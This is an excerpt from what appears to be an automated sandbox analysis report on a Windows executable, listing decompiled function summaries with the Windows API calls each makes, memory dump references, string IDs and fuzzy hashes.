                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0089BF82
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089BF95
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0089BFA4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                                    • Opcode ID: 516b700aae86749f3bf9e757169df407e289ce1b4108a8a7fd594aa9b6c1f00b
                                                                                                                                                                                                    • Instruction ID: 015ad748e3ba2f1fe9fdc4c06a633fddf79a06ccddd621586cbaf230917b21eb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 516b700aae86749f3bf9e757169df407e289ce1b4108a8a7fd594aa9b6c1f00b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3018F726056157F2B213ABA6D8DC7BBA6DFEC3BA13180129F904C2241EF608D0295B1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,008991AD,0089B188,?,00899813,00000001,00000364,?,008940EF,?,?,008B1098), ref: 0089986E
                                                                                                                                                                                                    • _free.LIBCMT ref: 008998A3
                                                                                                                                                                                                    • _free.LIBCMT ref: 008998CA
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 008998D7
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,008B1098), ref: 008998E0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                    • Opcode ID: aa7e2e89bf15f1753f9b8d05e93c31cb237e27acecf615e96cd49abc9de71130
                                                                                                                                                                                                    • Instruction ID: ac50d7fcc32127d66922d550eb24ec832cbebcc2d2044e94d247831f2ed2c6cf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa7e2e89bf15f1753f9b8d05e93c31cb237e27acecf615e96cd49abc9de71130
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4014436100A056BEE12332D6C8592B262DFBE337072C013CF851F2A92EE248C014162
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 008811CF: ResetEvent.KERNEL32(?), ref: 008811E1
                                                                                                                                                                                                      • Part of subcall function 008811CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008811F5
                                                                                                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00880F21
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00880F3B
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00880F54
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00880F60
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00880F6C
                                                                                                                                                                                                      • Part of subcall function 00880FE4: WaitForSingleObject.KERNEL32(?,000000FF,00881101,?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FEA
                                                                                                                                                                                                      • Part of subcall function 00880FE4: GetLastError.KERNEL32(?,?,0088117F,?,?,?,?,?,00881169), ref: 00880FF6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1868215902-0
                                                                                                                                                                                                    • Opcode ID: ea8edce4835b80905abb5cab0be94a34bc66d319e2e38fde951ffdfcb451b6b8
                                                                                                                                                                                                    • Instruction ID: 9d6a2790aafe123a9fde2999dc7c500a0a74bfeb42948d45e56680625ad5f8cd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea8edce4835b80905abb5cab0be94a34bc66d319e2e38fde951ffdfcb451b6b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B017172100B44EFD732AB68DD89BC6FBA9FB09710F004929F26B925A0CB757A45CB54
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C817
                                                                                                                                                                                                      • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
                                                                                                                                                                                                      • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C829
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C83B
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C84D
                                                                                                                                                                                                    • _free.LIBCMT ref: 0089C85F
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 40d46691be35ea11128a70dc0260335ac597d263309dbca8b99a8f1fa9d75317
• Instruction ID: 9dd3b07a4f10d4c2c1b61aed6e237fd0808ca913fcee619ba0e8d77c97cf9eef
• Opcode Fuzzy Hash: 40d46691be35ea11128a70dc0260335ac597d263309dbca8b99a8f1fa9d75317
• Instruction Fuzzy Hash: F3F01D32504201EBDE20FB68E9C6C1A73E9FA0675576C1C29F148E7952CB71FC80CA65
APIs
• _wcslen.LIBCMT ref: 00881FE5
• _wcslen.LIBCMT ref: 00881FF6
• _wcslen.LIBCMT ref: 00882006
• _wcslen.LIBCMT ref: 00882014
• CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0087B371,?,?,00000000,?,?,?), ref: 0088202F
Similarity
• API ID: _wcslen$CompareString
• String ID:
• API String ID: 3397213944-0
• Opcode ID: 22e7ef9e83dd21774ce66454b3a94566a2fbf509f21daf75b2774cc6bceebcaf
• Instruction ID: 204dc68727fef158f77c81d4881c3aad7c3b96a71b826acae879d70fb00b54af
• Opcode Fuzzy Hash: 22e7ef9e83dd21774ce66454b3a94566a2fbf509f21daf75b2774cc6bceebcaf
• Instruction Fuzzy Hash: BBF06732108018BBCF236F95EC09D8E3F26FB40770B258005FA1A9A461CB7296A1DB90
APIs
• _free.LIBCMT ref: 0089891E
  • Part of subcall function 00898DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?), ref: 00898DE2
  • Part of subcall function 00898DCC: GetLastError.KERNEL32(?,?,0089C896,?,00000000,?,00000000,?,0089C8BD,?,00000007,?,?,0089CCBA,?,?), ref: 00898DF4
• _free.LIBCMT ref: 00898930
• _free.LIBCMT ref: 00898943
• _free.LIBCMT ref: 00898954
• _free.LIBCMT ref: 00898965
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 4bc1aaae6ec0b062ec9f49b995cca5722bc35001d38cc3de21a8c3fd76aa989e
• Instruction ID: 6ccffb76554120ac35c96bfeab7a4a4662a0cded5191b31a6f7ac1450574a5d7
• Opcode Fuzzy Hash: 4bc1aaae6ec0b062ec9f49b995cca5722bc35001d38cc3de21a8c3fd76aa989e
• Instruction Fuzzy Hash: B4F0DA71816623DB9A467F58FC12415BFA1FB3A7643090B07F514D72B1CB3189519B82
Similarity
• API ID: _swprintf
• String ID: %ls$%s: %s
• API String ID: 589789837-2259941744
• Opcode ID: 3c216e0689095b6248536647480c6438364be3986538a791f4bf7c0f272dcbea
• Instruction ID: 854610dd2437f342af44552e4fd701bb81ad5e23631a96b90464ea714e1f8a56
• Opcode Fuzzy Hash: 3c216e0689095b6248536647480c6438364be3986538a791f4bf7c0f272dcbea
• Instruction Fuzzy Hash: A751E871284308F6EE1176948D4FF25725DFB25B08F14491AF3CBE44D5EEB2A812A71B
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\IYXE4Uz61k.exe,00000104), ref: 00897FAE
• _free.LIBCMT ref: 00898079
• _free.LIBCMT ref: 00898083
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\IYXE4Uz61k.exe
• API String ID: 2506810119-3152104929
• Opcode ID: 2cac499dcdb028d3a2fe4d906801af5f0cad0a7f372ec8044917263751039242
• Instruction ID: 342502ad664d50b4cf2aa531740053bb7766a236f64b17c439ecd6abcdce26db
• Opcode Fuzzy Hash: 2cac499dcdb028d3a2fe4d906801af5f0cad0a7f372ec8044917263751039242
• Instruction Fuzzy Hash: 0F31AD71A04609EFDF21EF999C8199EBBA8FBA6310F18416AF404E7210DA718A44CB61
APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008931FB
• _abort.LIBCMT ref: 00893306
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                    • API String ID: 948111806-2084237596
APIs
• __EH_prolog.LIBCMT ref: 00877406
  • Part of subcall function 00873BBA: __EH_prolog.LIBCMT ref: 00873BBF
• GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 008774CD
  • Part of subcall function 00877A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAB
  • Part of subcall function 00877A9C: GetLastError.KERNEL32 ref: 00877AF1
  • Part of subcall function 00877A9C: CloseHandle.KERNEL32(?), ref: 00877B00
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 3813983858-639343689
APIs
  • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
  • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
• EndDialog.USER32(?,00000001), ref: 0088AD98
• GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0088ADAD
• SetDlgItemTextW.USER32(?,00000066,?), ref: 0088ADC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
• API String ID: 445417207-3402441367
APIs
• __fprintf_l.LIBCMT ref: 0087D954
• _strncpy.LIBCMT ref: 0087D99A
  • Part of subcall function 00881DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,008B1030,?,0087D928,00000000,?,00000050,008B1030), ref: 00881DC4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
• API String ID: 562999700-834177443
APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0087AC5A,00000008,?,00000000,?,0087D22D,?,00000000), ref: 00880E85
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0087AC5A,00000008,?,00000000,?,0087D22D,?,00000000), ref: 00880E8F
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0087AC5A,00000008,?,00000000,?,0087D22D,?,00000000), ref: 00880E9F
Strings
• Thread pool initialization failed., xrefs: 00880EB7
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
APIs
  • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
  • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
• EndDialog.USER32(?,00000001), ref: 0088B2BE
• GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0088B2D6
• SetDlgItemTextW.USER32(?,00000067,?), ref: 0088B304
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
• API String ID: 445417207-3292211884
                                                                                                                                                                                                    • Opcode ID: 2762fdb4fa3be664b00b5afa46368c419d95c6e11244f631525fd03880b07d3b
                                                                                                                                                                                                    • Instruction ID: 92a09b029ce1d825fa53ec3203d985ad1092fd98b698cb96d100a3884015bf29
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2762fdb4fa3be664b00b5afa46368c419d95c6e11244f631525fd03880b07d3b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711C432900119B6DB21ABA89C49FFF376CFF99700F004021FA45F3284C7A5DE459762
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                    • API String ID: 0-56093855
                                                                                                                                                                                                    • Opcode ID: 34d9927a551a1488c76e81cff08078581507629bd71f91913fc6161d73559fc4
                                                                                                                                                                                                    • Instruction ID: 1aff7298ed0bdc0b1e0ee173b3d9d8b49d5632fce128b87de4f1da31432fdb88
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34d9927a551a1488c76e81cff08078581507629bd71f91913fc6161d73559fc4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8201DF36604349EFDB20AFA4FC44E9A7BA8F709354B000526F905C32B1C730AC90DBE0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                                                                                    • Instruction ID: 62310b910e3795f453732706add14e394ca2cfae8b4d348536a7b4117c0ac8c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75A13372A0029A9FEF21AE2CCC917AEBBE5FF65314F1C41ADE4C5DB281D2389941C751
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00877F69,?,?,?), ref: 0087A3FA
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00877F69,?), ref: 0087A43E
                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00877F69,?,?,?,?,?,?,?), ref: 0087A4BF
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00877F69,?,?,?,?,?,?,?,?,?,?), ref: 0087A4C6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2287278272-0
                                                                                                                                                                                                    • Opcode ID: ff0cf2e0030cbb01d0c6c63673d7d36e4488c5b11f188992b2986b654756fb76
                                                                                                                                                                                                    • Instruction ID: be6c0aa69ff3e926ca5694fce1493a9a7bb2b901cef1f16e815ce01e7658b716
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff0cf2e0030cbb01d0c6c63673d7d36e4488c5b11f188992b2986b654756fb76
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA41CF312483819AE735DF24DC49FAEBBE8FBC1304F048919B5D8D3294D6A5DA489B53
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                    • Opcode ID: 2d3f92ce1173060123439fb4816f2075998be7724b599fdb43b99b9e40a931fc
                                                                                                                                                                                                    • Instruction ID: 9dd4210cb7c95e9465419c3cb0f13c0dd889a3c64652d97da771d4902302b05f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d3f92ce1173060123439fb4816f2075998be7724b599fdb43b99b9e40a931fc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16418371A006695BCB51EF6C8C499DE7BB8FF01310F14412AFD49F7245DA30EE498BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,008947C6,00000000,00000000,008957FB,?,008957FB,?,00000001,008947C6,2DE85006,00000001,008957FB,008957FB), ref: 0089C9D5
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0089CA5E
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0089CA70
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0089CA79
                                                                                                                                                                                                      • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                    • Opcode ID: 3a47ff18b425db3aec811f5a6a0e3dd0c65c4258df7da1c243439c57b91872e4
                                                                                                                                                                                                    • Instruction ID: 8f59a085eaf18df4faa2a6d307506f7a622b18264fb81eac1b487d377d86505f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a47ff18b425db3aec811f5a6a0e3dd0c65c4258df7da1c243439c57b91872e4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59318EB2A0021AAFDF25EF68DC55DAE7BA5FB41310B184168FC05E6251EB36DD50CB90
APIs
• GetDC.USER32(00000000), ref: 0088A666
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0088A675
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0088A683
• ReleaseDC.USER32(00000000,00000000), ref: 0088A691
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
